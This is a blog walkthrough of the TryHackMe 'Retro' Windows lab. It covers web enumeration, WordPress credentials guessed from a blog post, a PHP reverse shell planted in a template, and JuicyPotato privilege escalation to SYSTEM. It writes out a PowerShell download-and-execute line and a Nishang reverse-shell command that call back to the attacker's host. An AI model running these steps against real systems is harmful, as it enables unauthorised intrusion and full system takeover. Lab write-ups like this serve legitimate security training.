TryHackMe WalkThrough — Retro

Fábio Mestre
Azkrath’s Cyber Security Blog
7 min readApr 5, 2021

During my journey to finish the Offensive Pentesting path on TryHackMe, I had to hack the several machines. This walkthrough is for Retro, a Windows based machine.

All flags and hashes will be redacted in order to prevent an easy win of the room. You can find the room here.

Enumeration

We get a warning right in the description of the task stating that the machine doesn’t respond to ICMP requests. Taking that into consideration, let’s start by running our nmap on our target with the flag -Pn:

Nmap scan with -Pn flag

As we can see, the machine name is RETROWEB and we have 2 ports open:

  • Port 80 — Web server running IIS
  • Port 3389 — RDP access

As usually, I tend to add an entry to /etc/hosts and use the machine’s name instead of the IP address whenever possible:

echo "10.10.13.117 retroweb" | sudo tee -a  /etc/hosts

Let’s check if we can find any web page on the target:

Default IIS web page

We get a default IIS web page so it is time to run gobuster and see what hidden directories we can find in the server:

New directory found

We can now answer the question “A web server is running on the target. What is the hidden directory which the website lives on?” with “/retro”.

By having a look into the site, we can see it is some kind of blog related to retro games, books and movies:

Main site

By checking our Wappalyzer plugin, we can see that the server is running Wordpress version 5.2.1:

Wappalyzer plugin analysis

Also a new gobuster search in the retro directory finds another set of Wordpress related directories:

Finding wordpress directories

So let’s head to the wp-login.php page and see if we can find some credentials:

Default login page for Wordpress

In Wordpress login pages, you can try different usernames and passwords and Wordpress will warn you, by default, if the password is wrong for that username, allowing a manual user enumeration. You can also use that to brute force your way, with something like Hydra. Usually I try to not brute force login pages unless I am really stuck in the machine for a while (as sometimes it is the intended path).

So after trying the default username and password, I’ve decided to head to the blog looking for clues, and found something that could give us a way in:

Blog post for the movie Ready Player One

So in here, ‘Wade’ mentions that this is its favorite book of all time, specially because his name is the same as the main protagonist. In the movie/book, Wade’s avatar was ‘parzival’, so let’s try the ‘wade’:’parzival’ combo for credentials:

And we’re in!

At this time, I remember that there is an RDP port open so let’s try the same credentials in the machine before doing anything else in Wordpress:

Wade session in Windows using the same credentials

After logging in, we can see the user.txt in the Desktop and get the first flag. We can now answer the question “user.txt” with the new found flag.

Privilege Escalation

Let’s begin by checking systeminfo and the groups and permissions we have with the ‘Wade’ user:

Systeminfo — Windows Server 2016
Information regarding user, groups and privileges

Usually if the machine is a Windows 10 with version 1809 or higher, or a Windows Server 2019, we can use something like Rogue Potato attack to escalate privileges. Otherwise, we can try a Juicy Potato attack. I am not going to enter into details regarding this type of attack, but in order for it to be possible, we need a low privilege account with one of the following privileges:

  • ‘SeImpersonatePrivilege’
  • ‘SeAssignPrimaryTokenPrivilege’.

So we conclude that the machine is running Windows Server 2016 and the user doesn’t have privileges to leverage our access to SYSTEM using something like a Potato privilege escalation attack.

After a while of enumerating services and programs, I remember that we still have the Wordpress access and maybe the account that it is running the webserver is a different one and has different privileges.

We start by logging in into Wordpress and creating a reverse shell in one of the page templates (you can set a reverse shell for Windows/PHP like this):

Reverse shel in the Main Index Template

Don’t forget to change the IP address and port for the ones you are going to use (IP address should be the one assigned to you when connecting to TryHackMe VPN). After editing the file, we need to open a netcat listener on our machine before refreshing the edited page:

Netcat listener

After refreshing the page, we should have our reverse shell popping up in our machine:

Reverse shell

Let’s start by checking what user is this and what privileges does it have:

New user information, groups and privileges

As we can see, the user retro has the ‘SeImpersonatePrivilege’ enabled that we need to leverage our access to SYSTEM so let’s try to use a Juicy Tomato attack on this one.

I tend to make a directory to perform my attacks, specially because it is easier to clean afterwards if needed. So let’s make a temp directory in the ‘C:\’:

cd C:\
mkdir temp
cd temp

So first we need to download our exploit. We can get the latest version here. After downloading this into our machine, we need to transfer it into the server. Lets open a Python Http server and download it from the other side using PowerShell.

On our machine we run this Python module on the directory where we have our exploit:

sudo Python3 -m http.server 80

And we should be able to access our web server using our IP address:

Our web server serving our exploit

Now we head to our server, start PowerShell and get the exploit into our newly created directory using the following command:

Invoke-WebRequest <resource_to_download> -outfile <output_file_name>
We can download the exploit using Invoke-WebRequest

After downloading the exploit, let’s see if we can run it in the machine:

Execution of JuicyTomato

Perfect! This will allow us to run executables as a SYSTEM level process, so we also need something to execute with the JuicyPotato executable. In this case, we can just use another Reverse Shell that will pop a SYSTEM shell on our side.

We can create one with MSFVenom or download one specific for this case, like the Nishang reverse shell from here.

So lets download the Invoke-PowerShellTcp.ps1 from the Shells directory and save it on our machine. Additionally, lets add a new line in the end of the file, containing the following command, replacing the IP and Port with our own:

Invoke-PowerShellTcp -Reverse -IPAddress <IP> -Port <Port>

Now lets get our reverse shell on the server using the same procedure:

Reverse shell to use as payload with JuicyPotato

Now we just need something executable, to execute our reverse shell and get a shell with SYSTEM privileges on our side. Lets create a .bat file and download it in the server using the same method. The .bat file should have the following code, with the IP replaced by our own IP address:

PowerShell “IEX(New-Object Net.WebClient).downloadString(‘http://<IP>/rshell.ps1')"

Now we need to download it into the server, using Invoke-WebRequest:

Bat file to be executed with the JuicyPotato

And now we just need to open a netcat listener on our side, on a different port that the one we are currently using in this shell:

Netcat listener on port 4445 for the SYSTEM shell

The flow of this attack is something like this:

  • The JuicyPotato exploit runs the .bat file as SYSTEM
  • The .bat file with SYSTEM privileges downloads our Nishang reverse shell and executes it
  • We get a SYSTEM shell on our side by using a netcat listener

So lets try our attack and see if we get a SYSTEM shell on our side. We can use the JuicyPotato like this:

.\j.exe -t * -p <path_to_executable.bat> -l 9002
Running our attack
SYSTEM shell on our side

Now we can just head to the Administrator Desktop and grab our root flag!

The root flag!

We can now answer the question “root.txt” with the new found root flag.

Overall, this machine was fun to solve. It is classified as a hard machine, but i think it is more of a medium difficulty.

I hope you enjoyed reading this post as much as I enjoyed writing it. Let me know in the comments if something is wrong or missing, as I am still learning myself and feedback is always welcomed :)

--

--

Fábio Mestre
Azkrath’s Cyber Security Blog

Pentester, CyberSecurity Enthusiast, Software Engineer, enjoys everything related to hacking, programming and cybersecurity.